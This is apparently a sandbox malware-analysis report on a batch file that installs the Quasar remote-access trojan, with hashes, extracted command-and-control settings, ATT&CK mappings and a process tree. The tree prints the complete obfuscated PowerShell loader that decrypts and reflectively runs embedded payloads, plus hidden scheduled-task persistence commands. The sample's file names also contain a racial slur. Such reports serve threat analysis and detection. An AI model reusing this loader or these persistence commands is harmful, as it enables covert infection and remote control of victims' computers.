quasar | 8a571346e3190daf5e2b5b30dea032feab8726dd423ec1446f0863d76cc9cd80

Analysis

max time kernel
94s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
10-01-2025 05:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NiggaKernel.bat
Size

1.8MB
MD5

049e158c496e1d81b51d8c3e85d769dc
SHA1

29717cc27f715c86e95b2027c87331c7b7f6a688
SHA256

8a571346e3190daf5e2b5b30dea032feab8726dd423ec1446f0863d76cc9cd80
SHA512

d81710454d8424e19b009b86d71938d101eee2a5b8b260a062d1931f59e1b38c0b05192b684c69218d46fee191744d7871c32e96376033347fa310274753163d
SSDEEP

24576:6JTtOJAdMrNp8QL585hVGeA7TycnoAE33Lio++/q1Bm6dS585gL2n6:8rEtoA+7qa6f5zn6

Score

10^/10

quasar niggavictim execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

NiggaVictim

TheSillyValor-36700.portmap.host:36700

Mutex

6c3995b9-837d-4aad-89fd-b25da7ae4c30

Attributes

encryption_key
029FCE648CA3D58DA3A16C9A8EBE57C1E2BA129C
install_name
niggakernel.exe
log_directory
Logs
reconnect_delay
3000
startup_key
niggakernel
subdirectory
niggakernel

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral2/memory/1628-52-0x0000019639F20000-0x000001963A244000-memory.dmp	family_quasar

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4268	powershell.exe
4712	powershell.exe
1628	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
1044	niggakernel.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\niggakernel\niggakernel.exe	powershell.exe
File opened for modification	C:\Windows\system32\niggakernel\niggakernel.exe	powershell.exe
File opened for modification	C:\Windows\system32\niggakernel	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2960	schtasks.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
4268	powershell.exe
4268	powershell.exe
4712	powershell.exe
4712	powershell.exe
1628	powershell.exe
1628	powershell.exe
1044	niggakernel.exe
1044	niggakernel.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4268	powershell.exe
Token: SeDebugPrivilege	4712	powershell.exe
Token: SeIncreaseQuotaPrivilege	4712	powershell.exe
Token: SeSecurityPrivilege	4712	powershell.exe
Token: SeTakeOwnershipPrivilege	4712	powershell.exe
Token: SeLoadDriverPrivilege	4712	powershell.exe
Token: SeSystemProfilePrivilege	4712	powershell.exe
Token: SeSystemtimePrivilege	4712	powershell.exe
Token: SeProfSingleProcessPrivilege	4712	powershell.exe
Token: SeIncBasePriorityPrivilege	4712	powershell.exe
Token: SeCreatePagefilePrivilege	4712	powershell.exe
Token: SeBackupPrivilege	4712	powershell.exe
Token: SeRestorePrivilege	4712	powershell.exe
Token: SeShutdownPrivilege	4712	powershell.exe
Token: SeDebugPrivilege	4712	powershell.exe
Token: SeSystemEnvironmentPrivilege	4712	powershell.exe
Token: SeRemoteShutdownPrivilege	4712	powershell.exe
Token: SeUndockPrivilege	4712	powershell.exe
Token: SeManageVolumePrivilege	4712	powershell.exe
Token: 33	4712	powershell.exe
Token: 34	4712	powershell.exe
Token: 35	4712	powershell.exe
Token: 36	4712	powershell.exe
Token: SeIncreaseQuotaPrivilege	4712	powershell.exe
Token: SeSecurityPrivilege	4712	powershell.exe
Token: SeTakeOwnershipPrivilege	4712	powershell.exe
Token: SeLoadDriverPrivilege	4712	powershell.exe
Token: SeSystemProfilePrivilege	4712	powershell.exe
Token: SeSystemtimePrivilege	4712	powershell.exe
Token: SeProfSingleProcessPrivilege	4712	powershell.exe
Token: SeIncBasePriorityPrivilege	4712	powershell.exe
Token: SeCreatePagefilePrivilege	4712	powershell.exe
Token: SeBackupPrivilege	4712	powershell.exe
Token: SeRestorePrivilege	4712	powershell.exe
Token: SeShutdownPrivilege	4712	powershell.exe
Token: SeDebugPrivilege	4712	powershell.exe
Token: SeSystemEnvironmentPrivilege	4712	powershell.exe
Token: SeRemoteShutdownPrivilege	4712	powershell.exe
Token: SeUndockPrivilege	4712	powershell.exe
Token: SeManageVolumePrivilege	4712	powershell.exe
Token: 33	4712	powershell.exe
Token: 34	4712	powershell.exe
Token: 35	4712	powershell.exe
Token: 36	4712	powershell.exe
Token: SeIncreaseQuotaPrivilege	4712	powershell.exe
Token: SeSecurityPrivilege	4712	powershell.exe
Token: SeTakeOwnershipPrivilege	4712	powershell.exe
Token: SeLoadDriverPrivilege	4712	powershell.exe
Token: SeSystemProfilePrivilege	4712	powershell.exe
Token: SeSystemtimePrivilege	4712	powershell.exe
Token: SeProfSingleProcessPrivilege	4712	powershell.exe
Token: SeIncBasePriorityPrivilege	4712	powershell.exe
Token: SeCreatePagefilePrivilege	4712	powershell.exe
Token: SeBackupPrivilege	4712	powershell.exe
Token: SeRestorePrivilege	4712	powershell.exe
Token: SeShutdownPrivilege	4712	powershell.exe
Token: SeDebugPrivilege	4712	powershell.exe
Token: SeSystemEnvironmentPrivilege	4712	powershell.exe
Token: SeRemoteShutdownPrivilege	4712	powershell.exe
Token: SeUndockPrivilege	4712	powershell.exe
Token: SeManageVolumePrivilege	4712	powershell.exe
Token: 33	4712	powershell.exe
Token: 34	4712	powershell.exe
Token: 35	4712	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 1092 wrote to memory of 4268	1092	cmd.exe	86
PID 1092 wrote to memory of 4268	1092	cmd.exe	86
PID 4268 wrote to memory of 4712	4268	powershell.exe	87
PID 4268 wrote to memory of 4712	4268	powershell.exe	87
PID 4268 wrote to memory of 5024	4268	powershell.exe	91
PID 4268 wrote to memory of 5024	4268	powershell.exe	91
PID 5024 wrote to memory of 4420	5024	WScript.exe	92
PID 5024 wrote to memory of 4420	5024	WScript.exe	92
PID 4420 wrote to memory of 1628	4420	cmd.exe	96
PID 4420 wrote to memory of 1628	4420	cmd.exe	96
PID 1628 wrote to memory of 2960	1628	powershell.exe	99
PID 1628 wrote to memory of 2960	1628	powershell.exe	99
PID 1628 wrote to memory of 1044	1628	powershell.exe	101
PID 1628 wrote to memory of 1044	1628	powershell.exe	101

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NiggaKernel.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jeg6IKA3PYqnc0jqPYpEjYg5Ext6Gg7nONNSKtICfDs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cP0G+VOQ29D99pgE3ouSrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $lzJIU=New-Object System.IO.MemoryStream(,$param_var); $eCZeV=New-Object System.IO.MemoryStream; $RWNMt=New-Object System.IO.Compression.GZipStream($lzJIU, [IO.Compression.CompressionMode]::Decompress); $RWNMt.CopyTo($eCZeV); $RWNMt.Dispose(); $lzJIU.Dispose(); $eCZeV.Dispose(); $eCZeV.ToArray();}function execute_function($param_var,$param2_var){ $PUspL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WpQxW=$PUspL.EntryPoint; $WpQxW.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\NiggaKernel.bat';$bUeYL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\NiggaKernel.bat').Split([Environment]::NewLine);foreach ($vtAXs in $bUeYL) { if ($vtAXs.StartsWith(':: ')) { $ZmRZW=$vtAXs.Substring(3); break; }}$payloads_var=[string[]]$ZmRZW.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4268
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_248_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_248.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4712
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_248.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:5024
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_248.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4420
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jeg6IKA3PYqnc0jqPYpEjYg5Ext6Gg7nONNSKtICfDs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cP0G+VOQ29D99pgE3ouSrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $lzJIU=New-Object System.IO.MemoryStream(,$param_var); $eCZeV=New-Object System.IO.MemoryStream; $RWNMt=New-Object System.IO.Compression.GZipStream($lzJIU, [IO.Compression.CompressionMode]::Decompress); $RWNMt.CopyTo($eCZeV); $RWNMt.Dispose(); $lzJIU.Dispose(); $eCZeV.Dispose(); $eCZeV.ToArray();}function execute_function($param_var,$param2_var){ $PUspL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WpQxW=$PUspL.EntryPoint; $WpQxW.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_248.bat';$bUeYL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_248.bat').Split([Environment]::NewLine);foreach ($vtAXs in $bUeYL) { if ($vtAXs.StartsWith(':: ')) { $ZmRZW=$vtAXs.Substring(3); break; }}$payloads_var=[string[]]$ZmRZW.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1628
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "niggakernel" /sc ONLOGON /tr "C:\Windows\system32\niggakernel\niggakernel.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2960
      - C:\Windows\system32\niggakernel\niggakernel.exe
        
        "C:\Windows\system32\niggakernel\niggakernel.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1044

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ee6f5f5e5924783870aeedeccdafe9da

SHA1
0e12ede20df5ec37f2bf3608ad1bc9b4649450fd

SHA256
ebf215446a1b5afa86e8ba4316bc99c6d7918acd595786a31e0e5974f4e0f416

SHA512
998bad1b069cb0e7a57edef247421e5d5bc0b4f071bd16e4260367e86ac62053168204abc850365bf6eb4f41b32568bea99eb9afda60e7746eff37e604cbe61f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aucbbaby.r4e.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_248.bat

Filesize
1.8MB

MD5
049e158c496e1d81b51d8c3e85d769dc

SHA1
29717cc27f715c86e95b2027c87331c7b7f6a688

SHA256
8a571346e3190daf5e2b5b30dea032feab8726dd423ec1446f0863d76cc9cd80

SHA512
d81710454d8424e19b009b86d71938d101eee2a5b8b260a062d1931f59e1b38c0b05192b684c69218d46fee191744d7871c32e96376033347fa310274753163d

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_248.vbs

Filesize
115B

MD5
edf9906f8771607dca50bab144c9a1fd

SHA1
6e3d7fc505c23ad51a36e2329867655f954f5c99

SHA256
8acc6c79f94d5ea50a02bd7aea5a11072e1680c858c5f1f88e7b4543847b0081

SHA512
ce22ca97b3883e01964b47a6678336f0affb8f68c0d3a37396a8e001c03df81f029a6f1ab523c82f145078c4c1640faf9447de8334fadc4cd1bcbead102d8983

Download Submit
C:\Windows\System32\niggakernel\niggakernel.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
memory/1044-68-0x000002183FDE0000-0x000002183FE56000-memory.dmp

Filesize
472KB

Download
memory/1044-67-0x000002183FD10000-0x000002183FD54000-memory.dmp

Filesize
272KB

Download
memory/1628-52-0x0000019639F20000-0x000001963A244000-memory.dmp

Filesize
3.1MB

Download
memory/4268-39-0x00007FFAF2303000-0x00007FFAF2305000-memory.dmp

Filesize
8KB

Download
memory/4268-14-0x000001D5B3550000-0x000001D5B36A8000-memory.dmp

Filesize
1.3MB

Download
memory/4268-0-0x00007FFAF2303000-0x00007FFAF2305000-memory.dmp

Filesize
8KB

Download
memory/4268-40-0x00007FFAF2300000-0x00007FFAF2DC1000-memory.dmp

Filesize
10.8MB

Download
memory/4268-51-0x00007FFAF2300000-0x00007FFAF2DC1000-memory.dmp

Filesize
10.8MB

Download
memory/4268-13-0x000001D5B31E0000-0x000001D5B31E8000-memory.dmp

Filesize
32KB

Download
memory/4268-12-0x00007FFAF2300000-0x00007FFAF2DC1000-memory.dmp

Filesize
10.8MB

Download
memory/4268-11-0x00007FFAF2300000-0x00007FFAF2DC1000-memory.dmp

Filesize
10.8MB

Download
memory/4268-6-0x000001D5B31F0000-0x000001D5B3212000-memory.dmp

Filesize
136KB

Download
memory/4712-30-0x00007FFAF2300000-0x00007FFAF2DC1000-memory.dmp

Filesize
10.8MB

Download
memory/4712-27-0x00007FFAF2300000-0x00007FFAF2DC1000-memory.dmp

Filesize
10.8MB

Download
memory/4712-17-0x00007FFAF2300000-0x00007FFAF2DC1000-memory.dmp

Filesize
10.8MB

Download
memory/4712-16-0x00007FFAF2300000-0x00007FFAF2DC1000-memory.dmp

Filesize
10.8MB

Download